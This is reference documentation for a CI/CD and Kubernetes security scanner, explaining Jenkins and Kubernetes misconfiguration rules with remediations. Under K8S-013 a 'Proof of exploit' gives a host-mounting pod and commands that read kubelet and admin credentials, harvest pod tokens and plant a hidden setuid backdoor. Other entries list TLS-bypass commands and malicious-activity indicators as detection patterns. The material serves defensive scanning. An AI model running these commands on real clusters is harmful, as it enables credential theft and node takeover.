Source: JF-020 in the Jenkins provider.
JF-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-023 in the Jenkins provider.
JF-024: input approval step missing submitter restriction MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. JF-005 already flags deploy stages with no input step. This rule catches the subtler case: the gate exists, but it doesn't actually restrict approvers. submitter accepts a comma-separated list of Jenkins usernames and group names; scope it to the smallest release-eligible pool.
Recommendation. Add a submitter: 'releasers,sre' (or a single role) argument to every input step in a deploy-like stage. Without it, any user with the Jenkins job Build permission can approve a production promotion, the approval gate becomes advisory.
Source: JF-024 in the Jenkins provider.
JF-025: Kubernetes agent pod template runs privileged or mounts hostPath HIGH
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. JF-017 flags inline docker run commands. This rule targets the other privileged-mode entry point: Jenkins' Kubernetes plugin lets pipelines declare agent { kubernetes { yaml '''...''' } }. A pod running with privileged: true or mounting hostPath: / gives the build container the same blast radius, container escape, node-credential theft, cross-tenant contamination on a shared cluster.
Recommendation. Remove privileged: true from the embedded pod YAML, drop hostPath/hostNetwork/hostPID/hostIPC entries, and add a securityContext with runAsNonRoot: true and a readOnlyRootFilesystem. If Docker-in-Docker is genuinely required, use a rootless daemon (e.g. sysbox) or run the build on a dedicated privileged pool with stricter branch protection.
Source: JF-025 in the Jenkins provider.
JF-026: build job: trigger ignores downstream failure MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. The Jenkins Pipeline plugin defaults wait to true and propagate to true, but either can be flipped per call. wait: false returns immediately; propagate: false continues even when the downstream job fails or is aborted. Both patterns sever the flow-control link between the upstream approval gate and the work the downstream job is about to do.
Recommendation. Remove wait: false and propagate: false from every build job: step, or replace them with an explicit currentBuild.result = build(...).result check. A fire-and-forget trigger can silently ship broken artifacts because the upstream job reports success regardless of what the downstream job actually did.
Source: JF-026 in the Jenkins provider.
JF-028: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. cosign sign signs the artifact bytes. cosign attest signs an in-toto statement describing how the build ran, builder, source commit, input parameters. SLSA L3 verifiers check the latter so consumers can enforce policy on where and how artifacts were produced.
Recommendation. Add a sh 'cosign attest --predicate=provenance.intoto.jsonl …' step after the build, or integrate the TestifySec witness run attestor. JF-006 covers signing; this rule covers the build-provenance statement SLSA Build L3 requires.
Source: JF-028 in the Jenkins provider.
JF-029: Jenkinsfile contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Distinct from JF-016 (curl pipe) and JF-019 (Groovy sandbox escape). Those flag risky defaults; this flags concrete evidence, reverse shells, base64-decoded execution, miner binaries, exfil channels, credential-dump pipes, shell-history erasure. Runs on the comment-stripped Groovy text so // cosign verify … // webhook.site in a legitimate annotation doesn't false-positive.
Recommendation. Treat as a potential compromise. Identify the commit that introduced the matching stage(s), rotate Jenkins credentials the job can reach, review controller/agent audit logs for outbound traffic to the matched hosts, and re-image the agent pool if the compromise may have persisted.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain
example,fixture,sample,demo, ortestare auto-suppressed; bare lines in a production pipeline still fire. - Defaults to LOW confidence. Filter with
--min-confidence MEDIUMto ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: JF-029 in the Jenkins provider.
JF-030: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Complements JF-002 (script injection from untrusted build parameters). Fires on intrinsically risky shell idioms, eval, sh -c "$X", backtick exec, regardless of whether the input source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate any value feeding a dynamic command at the boundary, or pass arguments as a list to a real sh step so the shell is not re-invoked.
Known false positives.
sh 'eval "$(ssh-agent -s)"'and similareval "$(<literal-tool>)"bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.
Source: JF-030 in the Jenkins provider.
K8S-001: Container image not pinned by sha256 digest HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Reuses _primitives.image_pinning.classify so the floating-tag semantics match DF-001 / GL-001 / JF-009 / ADO-009 / CC-003. Even a PINNED_TAG like nginx:1.25.4 is treated as unpinned, only an explicit @sha256: survives, since a tag is mutable on the registry side and Kubernetes will happily pull the new content on a node restart.
Recommendation. Resolve every workload container image to its current digest (crane digest <ref> or docker buildx imagetools inspect) and pin via image: repo@sha256:<digest>. Floating tags (:latest, :3, no tag) silently swap the running image on the next rollout, breaking provenance and reproducibility.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-001 in the Kubernetes provider.
K8S-002: Pod hostNetwork: true HIGH 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Compromised containers on hostNetwork can sniff or interfere with traffic from every other pod on the node. Reserve the flag for system DaemonSets that genuinely require it (CNI agents, ingress data planes); applications never need it.
Recommendation. Set spec.hostNetwork: false (the default) on every workload. hostNetwork: true puts the pod directly on the node's network namespace, exposing every host-bound listener to the container and bypassing CNI network policies.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-002 in the Kubernetes provider.
K8S-003: Pod hostPID: true HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. There is no application use case for hostPID. Only specialised node agents (process exporters, debuggers) legitimately need it, and those are typically deployed via a system DaemonSet with an explicit security review.
Recommendation. Set spec.hostPID: false (the default) on every workload. hostPID: true makes every host process visible inside the container, and combined with privileged execution allows trivial escape via nsenter / /proc/<pid>/root.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-003 in the Kubernetes provider.
K8S-004: Pod hostIPC: true HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Modern applications coordinate via gRPC / sockets, never via host IPC. Treat this flag as a strong red flag in code review unless paired with a documented system-level use case.
Recommendation. Set spec.hostIPC: false (the default) on every workload. hostIPC: true lets the container read and write the host's shared-memory segments and POSIX message queues, exposing data exchanged by every other process on the node.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-004 in the Kubernetes provider.
K8S-005: Container securityContext.privileged: true CRITICAL 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. privileged: true is the strongest possible escalation in Kubernetes. It overrides every other securityContext setting and is the single largest cluster-takeover vector after RBAC misconfiguration.
Recommendation. Remove securityContext.privileged: true from every container. A privileged container has full access to the host's devices and capabilities, escape to the node is trivial. If the workload genuinely needs a kernel capability, grant only that capability via capabilities.add rather than enabling privileged mode.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-005 in the Kubernetes provider.
K8S-006: Container allowPrivilegeEscalation not explicitly false HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. The default for non-root containers is True (Pod Security Standard 'baseline' allows this; 'restricted' does not). An explicit false is required because Kubernetes treats an unset field as a deferral to the cluster admission controller, which may not enforce restricted.
Recommendation. Set securityContext.allowPrivilegeEscalation: false on every container. The Linux no_new_privs flag stops setuid binaries and capabilities from gaining elevated privileges, without this, a compromised process can escape via setuid utilities still installed in many base images.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-006 in the Kubernetes provider.
K8S-007: Container runAsNonRoot not true / runAsUser is 0 HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. A container is considered safe when EITHER its own securityContext OR the pod-level securityContext sets runAsNonRoot: true and a non-zero runAsUser. An explicit runAsUser: 0 always fails, even if runAsNonRoot is unset.
Recommendation. Set securityContext.runAsNonRoot: true and runAsUser: <non-zero UID> on every container, OR set the same fields at pod level so all containers inherit. Running as UID 0 inside a container makes container-escape exploits dramatically more dangerous, the attacker already has root inside the container, so any kernel CVE that matters becomes immediately exploitable.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-007 in the Kubernetes provider.
K8S-008: Container readOnlyRootFilesystem not true MEDIUM 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Many post-exploitation toolchains (cryptominers, persistence implants, shell-callbacks) assume a writable root. Locking it down forces the attacker to use distroless or runtime tmpfs they can't easily place.
Recommendation. Set securityContext.readOnlyRootFilesystem: true on every container. A read-only root filesystem stops attackers from dropping additional payloads into /tmp, /var, or writable system paths. Mount tmpfs emptyDir volumes for the directories the application genuinely needs to write to.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-008 in the Kubernetes provider.
K8S-009: Container capabilities not dropping ALL / adding dangerous caps HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Fails when the container does NOT drop ALL or when capabilities.add includes any of: SYS_ADMIN, NET_ADMIN, SYS_PTRACE, SYS_MODULE, DAC_READ_SEARCH, DAC_OVERRIDE, SYS_RAWIO, SYS_BOOT, BPF, PERFMON, or the literal ALL.
Recommendation. Drop every capability and add back only what the workload actually needs:
securityContext:
capabilities:
drop: ["ALL"]
add: ["NET_BIND_SERVICE"] # only if binding <1024
Most stateless services need no capabilities at all. Avoid SYS_ADMIN (effectively root), SYS_PTRACE (process snooping), NET_ADMIN (raw socket access), and SYS_MODULE (kernel module loading).
Source: K8S-009 in the Kubernetes provider.
K8S-010: Container seccompProfile not RuntimeDefault or Localhost MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Pod-level securityContext.seccompProfile covers all containers in the pod. Either path passes this rule. The default of Unconfined (or unset, which inherits the node default, usually Unconfined) fails.
Recommendation. Set securityContext.seccompProfile.type: RuntimeDefault (or Localhost with a path to your tuned profile) at either pod or container level. Without seccomp, every syscall is reachable from the container, modern kernel CVEs (e.g. io_uring) become trivially exploitable.
Source: K8S-010 in the Kubernetes provider.
K8S-011: Pod serviceAccountName unset or 'default' MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Both an unset serviceAccountName (which defaults to default) and an explicit serviceAccountName: default fail the rule. Pair this with K8S-012 to also disable token auto-mounting where the workload doesn't need API access.
Recommendation. Bind every workload to a dedicated, narrow ServiceAccount. The 'default' SA exists in every namespace and tends to accrete RoleBindings over time, using it gives the workload every privilege any other service in the namespace ever needed. Create a per-workload SA with the minimum RBAC needed and reference it via spec.serviceAccountName.
Source: K8S-011 in the Kubernetes provider.
K8S-012: Pod automountServiceAccountToken not false MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. An unset value defaults to True in Kubernetes. This rule fails on unset because most application workloads do NOT need API access and the default exposes credentials by accident. Workloads that explicitly call the API should set the field to true so the choice is visible in code review.
Recommendation. Set spec.automountServiceAccountToken: false on every workload that doesn't need to talk to the Kubernetes API. Auto-mounted SA tokens are a free credential for an attacker who lands a shell, without explicit opt-out the token sits at /var/run/secrets/kubernetes.io/serviceaccount/token ready to be exfiltrated. If the workload needs API access, leave it true but pair with a tight, dedicated RBAC role.
Source: K8S-012 in the Kubernetes provider.
K8S-013: Pod uses a hostPath volume HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Some legitimate system DaemonSets need hostPath (log collectors, CSI node plugins). Those should be deployed with explicit security review and a narrow path:; this rule fires regardless because application workloads should never use hostPath.
Recommendation. Replace hostPath volumes with configMap, secret, emptyDir, persistentVolumeClaim, or CSI volumes. hostPath opens a direct read/write window onto the node's filesystem; combined with even mild container compromise it gives the attacker access to other pods' data, kubelet credentials, and the container runtime.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- CVE-2021-25741 (Kubernetes subpath symlink escape): a container with
hostPathplus subpath could traverse outside the volume boundary and read or modify arbitrary host files. Exploitable on any cluster permitting hostPath to non-system workloads. - TeamTNT / Kinsing crypto-jacking campaigns (2020-2022): cluster compromise reports repeatedly traced lateral movement from a single misconfigured pod to the underlying node via hostPath:/, then to kubelet credentials and other tenants. Sysdig and Aqua incident reports document the pattern.
Proof of exploit.
Vulnerable: pod mounts the host's root filesystem.
apiVersion: v1 kind: Pod metadata: name: attacker spec: containers: - name: shell image: busybox command: ["sleep", "infinity"] volumeMounts: - name: host-root mountPath: /host volumes: - name: host-root hostPath: path: / # full node filesystem
Attack from a shell inside the container:
# Read kubelet credentials and pivot to API server:
cat /host/var/lib/kubelet/kubeconfig
cat /host/etc/kubernetes/admin.conf
# Read service account tokens for every other pod on
# the node and impersonate them:
ls /host/var/lib/kubelet/pods//volumes/kubernetes.io~projected//token
# Drop a setuid binary and pin persistence on the host:
cp /bin/busybox /host/usr/local/bin/.bd
chmod 4755 /host/usr/local/bin/.bd
Safe: use scoped volume types that don't bridge to the host.
spec: volumes: - name: data persistentVolumeClaim: claimName: app-data
Source: K8S-013 in the Kubernetes provider.
K8S-014: Pod hostPath references a sensitive host directory CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Stricter than K8S-013: that rule flags any hostPath, this one upgrades to CRITICAL when the path is one of the well-known cluster-escape vectors.
Recommendation. Never mount the container runtime socket (/var/run/docker.sock, containerd.sock, crio.sock), kubelet credentials (/var/lib/kubelet), the cluster config (/etc/kubernetes), the host root (/), or /proc / /sys / /etc into a workload container. Each of these is a one-line cluster takeover. If a container genuinely needs node-level metrics, use an exporter DaemonSet with a narrowly-scoped read-only mount.
Source: K8S-014 in the Kubernetes provider.
K8S-017: Container env value carries a credential-shaped literal CRITICAL
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Reuses _primitives/secret_shapes, flags AKIA-prefixed AWS access keys outright, plus credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) when the value is a non-empty literal. valueFrom entries are always safe (no inline value).
Recommendation. Replace literal env[].value entries that hold credentials with env[].valueFrom.secretKeyRef or envFrom.secretRef. A literal env value lives in the manifest YAML. It gets committed to git, surfaced by kubectl get pod -o yaml, and embedded in audit logs. Externalising into a Secret (and ideally a SealedSecret / ExternalSecret / SOPS-encrypted source) keeps the value out of the manifest.
Source: K8S-017 in the Kubernetes provider.
K8S-018: Secret stringData/data carries a credential-shaped literal CRITICAL
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Walks both stringData (plain text) and data (base64). Base64-encoded values are decoded and checked for AKIA-shaped AWS keys. Credential-shaped key NAMES with any non-empty value are flagged regardless of encoding, even if the value is the literal placeholder REPLACE_ME, having the name in the manifest is a maintenance footgun.
Recommendation. A Kind: Secret manifest committed to git defeats every secret-management story Kubernetes claims to provide, the base64 encoding in data is not encryption. Replace with SealedSecrets (Bitnami), ExternalSecrets / ESO, SOPS-encrypted manifests, or HashiCorp Vault Agent injection. If the manifest must remain in git, the only acceptable contents are placeholders that are filled in by an operator at apply time.
Source: K8S-018 in the Kubernetes provider.
K8S-019: Workload deployed in the 'default' namespace LOW
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Severity is LOW because in a well-curated cluster the default namespace is empty by policy. If your cluster treats default as a sandbox you can suppress this rule via .pipelinecheckignore.
Recommendation. Set metadata.namespace to a dedicated namespace per workload (or per environment). The default namespace tends to accumulate cluster-wide RoleBindings, NetworkPolicies, and operators that grant broader access than intended; placing application workloads there means every privilege grant in default applies to them. A purpose-built namespace also lets you enforce Pod Security Standards (pod-security.kubernetes.io/enforce label) scoped to that workload.
Source: K8S-019 in the Kubernetes provider.
K8S-020: ClusterRoleBinding grants cluster-admin or system:masters CRITICAL 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. The rule fires on a ClusterRoleBinding whose roleRef.name is cluster-admin, admin, or system:masters. Subject type does not matter, even binding cluster-admin to a Group is a cluster-takeover risk.
Recommendation. Replace cluster-admin / system:masters bindings with narrowly-scoped ClusterRoles or namespace-scoped Roles. Granting cluster-admin to a service account is equivalent to giving every pod that uses it root on every node, credential theft from any such pod becomes immediate cluster takeover. Audit-log every existing cluster-admin binding and replace each with the minimum verbs/resources the consumer actually needs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- Tesla Kubernetes dashboard compromise (RedLock, 2018): an unauthenticated Kubernetes dashboard exposed to the internet held tokens for service accounts bound to cluster-admin. Attackers used the dashboard credentials to deploy crypto-mining workloads with full cluster access. Least-privilege RBAC would have capped the blast radius even after dashboard exposure.
- Argo CD CVE-2022-24348 / CVE-2022-24768 chain (2022): directory traversal plus a default cluster-admin install let any project member exfiltrate cluster-wide secrets. Argo's recommendation post-fix was to scope the controller's RBAC away from cluster-admin so a similar future bug couldn't escalate the same way.
Source: K8S-020 in the Kubernetes provider.
K8S-021: Role or ClusterRole grants wildcard verbs+resources HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Fires on any rule entry where BOTH verbs and resources contain a literal "*". A wildcard in only one of the two is still risky but is often a legitimate read-everything pattern (e.g. monitoring); this rule targets the strict superset 'do anything to everything'.
Recommendation. Replace verbs: ["*"] and resources: ["*"] with explicit lists. Wildcards bypass the principle of least privilege: today they grant read pods and tomorrow they grant delete crds because a new resource was registered in that apiGroup. Explicit verbs (get, list, watch) and explicit resources (configmaps, services) keep grants stable across cluster upgrades.
Source: K8S-021 in the Kubernetes provider.
K8S-022: Service exposes SSH (port 22) MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Mirrors DF-013 (EXPOSE 22 in a Dockerfile) at the Service level. The check fires on Service ports whose port or targetPort is 22, regardless of Service type, a NodePort/LoadBalancer 22 is dramatically worse but a ClusterIP 22 still indicates an sshd container somewhere.
Recommendation. Containers should not run sshd. If you need an interactive shell into a running pod, use kubectl exec (subject to RBAC) or kubectl debug. Removing the port-22 Service removes a pre-auth network surface that's a frequent lateral-movement target after initial cluster compromise.
Source: K8S-022 in the Kubernetes provider.
K8S-023: Namespace missing Pod Security Admission enforcement label HIGH
Evidences: CC7.1 Detection procedures identify configuration changes that introduce vulnerabilities.
How this is detected. Pod Security Admission (PSA) replaced the deprecated PodSecurityPolicy in 1.25. The three levels are privileged, baseline, and restricted; baseline is a sensible production default and restricted matches the spirit of K8S-005..010. kube-system is exempt by convention since control-plane pods may legitimately need elevated permissions.
Recommendation. Set metadata.labels.pod-security.kubernetes.io/enforce to baseline or restricted on every Namespace. Without an enforce label the namespace runs the cluster's default policy, which on most installations is privileged and silently admits pods that violate every K8S-002..010 rule.
Known false positives.
- Single-tenant clusters running only operator-managed workloads may apply PSA via an admission webhook instead. The label-based check can't see that.
Source: K8S-023 in the Kubernetes provider.
K8S-024: Container missing both livenessProbe and readinessProbe MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Init containers and ephemeral debug containers are exempt, neither makes sense to probe. Jobs and CronJobs are also exempt because Kubernetes treats them as one-shot work; completion is the lifecycle signal, not health.
Recommendation. Define at least one of livenessProbe or readinessProbe on every long-running container. Without probes, a wedged pod stays listed as Running and keeps receiving traffic, which masks incidents and amplifies the blast radius of a single faulty replica.
Source: K8S-024 in the Kubernetes provider.
K8S-026: LoadBalancer Service has no loadBalancerSourceRanges HIGH
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Internal-only services should use type: ClusterIP (and an Ingress for HTTP) or set the cloud-provider-specific internal-LB annotation. loadBalancerSourceRanges is the Kubernetes-native, cloud-portable way to scope an external LB; cloud-specific firewalls (AWS security groups, GCP firewall rules) are equivalent at the L4 level but invisible to a manifest scanner.
Recommendation. Restrict every Service of type: LoadBalancer with spec.loadBalancerSourceRanges. The default behavior is to provision an internet-facing load balancer that accepts traffic from 0.0.0.0/0, which exposes whatever the Service fronts to the entire internet. A short list of CIDRs scoped to known clients (office IPs, a NAT gateway, peered VPCs) removes the pre-auth attack surface entirely.
Source: K8S-026 in the Kubernetes provider.
K8S-027: Ingress has no TLS configuration MEDIUM
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. An Ingress with no spec.tls (or an empty list) terminates HTTP at the load balancer and proxies plaintext upstream. Ingress controllers will respect ssl-redirect annotations, but those are advisory until tls: is populated. If the Ingress is intentionally HTTP-only (e.g. an ACME challenge endpoint or an internal-only path served behind a network policy), suppress via .pipelinecheckignore with a short rationale rather than leaving it open.
Recommendation. Add a spec.tls block to every Ingress that fronts an HTTP backend. Each entry pairs one or more hostnames with a Secret holding the certificate / key, the canonical pattern is to provision the Secret via cert-manager and a ClusterIssuer pointing at Let's Encrypt or an internal CA. Plaintext-only Ingress lets a network attacker downgrade the connection and read or rewrite request bodies, which matters for any path carrying credentials, session cookies, or PII.
Source: K8S-027 in the Kubernetes provider.
K8S-028: Container declares hostPort MEDIUM 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. hostPort was the pre-Service way to publish a pod's port and survives in legacy manifests. Modern clusters use Services, which integrate with the kube-proxy, ingress controllers, and NetworkPolicies. hostPort is invisible to all of those, a port-scan from any other pod that knows the node IP reaches the workload directly. If a DaemonSet legitimately needs it (host-agent shape), suppress this rule with a brief .pipelinecheckignore rationale rather than leaving it open across the catalog.
Recommendation. Drop hostPort from container ports and use a Service (ClusterIP / NodePort / LoadBalancer) to publish the workload. hostPort binds directly to the node IP, bypasses the cluster's network model, and creates a node-level scheduling constraint that fails replicas with the same port. Workloads that genuinely need node-port binding (some CNI/storage agents) should declare it on a DaemonSet with hostNetwork: true already approved by review.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-028 in the Kubernetes provider.
K8S-029: RoleBinding grants permissions to the default ServiceAccount HIGH 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Fires when a RoleBinding or ClusterRoleBinding lists kind: ServiceAccount, name: default among its subjects. kube-system, kube-public, and kube-node-lease are exempt because control-plane bootstrap manifests legitimately grant the default SA there.
Recommendation. Bind permissions to a dedicated ServiceAccount, not to default. Every pod that omits serviceAccountName runs as the namespace's default SA, so a binding to it grants the same verbs to every untargeted pod in that namespace, including future workloads. Create a purpose-built SA, set automountServiceAccountToken: false on the default, and bind to the new SA explicitly.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Charts that intentionally re-use the default SA in single-tenant namespaces. Consider creating a named SA anyway. It keeps the audit log unambiguous about which workload made an API call.
Source: K8S-029 in the Kubernetes provider.
K8S-031: Namespace missing PSA warn label LOW
Evidences: CC7.1 Detection procedures identify configuration changes that introduce vulnerabilities.
How this is detected. Pod Security Admission supports three modes: enforce (reject), audit (log to API audit), and warn (return a kubectl warning). K8S-023 covers enforce; this rule covers warn. The convention from upstream PSA docs is to set warn to the next-strictest tier above your current enforce so an upgrade from baseline to restricted is a predictable rollout, not a surprise.
Recommendation. Set metadata.labels.pod-security.kubernetes.io/warn on every Namespace, ideally one tier ahead of the enforce label (e.g. enforce: baseline + warn: restricted). The warn level surfaces violations as kubectl apply warnings without rejecting the resource, developers see what would break before an enforcement upgrade lands.
Known false positives.
- Single-tenant clusters may set
warnandauditglobally via the AdmissionConfigurationdefaults:block instead of per-namespace labels. The label-based check can't see that.
Source: K8S-031 in the Kubernetes provider.
K8S-032: Namespace lacks default-deny NetworkPolicy MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Kubernetes' default network model is allow-everything: without any NetworkPolicy targeting a namespace, every pod can talk to every other pod across every namespace, and every pod can reach the internet. A default-deny policy flips the default to deny, so the only flows that work are those an explicit allow policy permits. The check fires on namespaces declared in the manifest set that have at least one workload but no default-deny NetworkPolicy covering them. Cross-doc correlation: it walks the full manifest stream to match Namespace/workload/NetworkPolicy across files.
Recommendation. Apply a default-deny NetworkPolicy in every namespace that carries workloads. The canonical shape is podSelector: {} (matches every pod) plus policyTypes: [Ingress, Egress] with no ingress: / egress: rules, every flow is denied unless a more permissive NetworkPolicy in the same namespace explicitly allows it. Pair with per-workload allow-list policies for the flows the application actually needs.
Known false positives.
- Mesh-managed clusters (Istio, Linkerd, Cilium ClusterMesh) often delegate L4 default-deny to the mesh's authorization policy. The check only looks at native NetworkPolicy and won't see that.
- kube-system / kube-public / kube-node-lease are exempt, control-plane components frequently need open networking and have their own admission-time guards.
Source: K8S-032 in the Kubernetes provider.
K8S-033: Namespace lacks ResourceQuota or LimitRange MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Without a ResourceQuota, a single namespace can consume the cluster's entire scheduling capacity, a fork bomb in a CronJob, a memory leak in a Deployment, or a cryptominer that landed via a fork-PR build can starve every other tenant. Without a LimitRange, individual pods without explicit resources: requests get a default of zero, the scheduler treats them as best-effort and packs them on any node, including ones already at memory pressure. The two work together: quota caps the aggregate, range caps the per-workload baseline. Cross-doc correlation: walks the manifest stream to match Namespace / workload / ResourceQuota / LimitRange across files.
Recommendation. Apply a ResourceQuota and a LimitRange to every namespace that hosts application workloads. ResourceQuota caps the namespace's total CPU / memory / pod / object consumption; LimitRange enforces per-pod request / limit defaults so a workload that forgets to declare its own doesn't get unbounded scheduling. Together they bound the blast radius of a runaway, leaky, or attacker-driven pod explosion to a single namespace.
Source: K8S-033 in the Kubernetes provider.
K8S-034: ServiceAccount automountServiceAccountToken not explicitly false MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. K8S-012 covers the pod-level automountServiceAccountToken setting; this rule covers the same control at the ServiceAccount level. The two are complementary: the SA-level default flips the cluster-wide baseline (true -> false), the pod-level override re-enables only where needed. Without the SA-level disable, every pod that doesn't set its own override mounts a token that can call the K8s API as that SA, a useful credential for an attacker who lands code in any pod, regardless of the workload's own intent.
Recommendation. Set automountServiceAccountToken: false at the ServiceAccount level for every SA that doesn't actively need to call the Kubernetes API. The pods that legitimately do (operators, sidecars that read namespaces, controllers) can opt back in per-pod via spec.automountServiceAccountToken: true. The default is mount-everywhere, which is the wrong direction for least privilege.
Known false positives.
- Operator / controller workloads (cert-manager, metrics-server, ingress controllers) legitimately need API access from every pod. Their dedicated SAs should keep automount enabled, leave them out of the cluster-wide disable.
defaultSA in every namespace is the high-fire case worth disabling.
Source: K8S-034 in the Kubernetes provider.
K8S-035: Container securityContext.runAsUser is 0 HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. K8S-007 covers runAsNonRoot: false (the boolean form). This rule covers the explicit numeric form: a container that sets runAsUser: 0 runs as root regardless of runAsNonRoot being declared elsewhere. Kubernetes won't reject the spec, it just runs the container as root. The two rules are paired so neither shape slips through alone. The pod-level securityContext.runAsUser inherits to every container that doesn't override it; this rule fires on the effective UID, walking pod-level first then per-container override.
Recommendation. Set securityContext.runAsUser to a non-zero UID (e.g. 1000 or any application-specific value) on every workload container. The corresponding runAsGroup and fsGroup should also be non-zero. Root inside a container is not isolation, a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.
Source: K8S-035 in the Kubernetes provider.
K8S-036: ServiceAccount imagePullSecrets references missing Secret MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Cross-doc correlation: walks every ServiceAccount's imagePullSecrets and confirms the named Secret exists in the same namespace within the manifest set. Misses two cases: secrets created out-of-band (Sealed Secrets, External Secrets, or operator-applied ones) and SAs whose namespace is implicit / not declared in the manifest set. For those, the rule passes, false-negative-friendly.
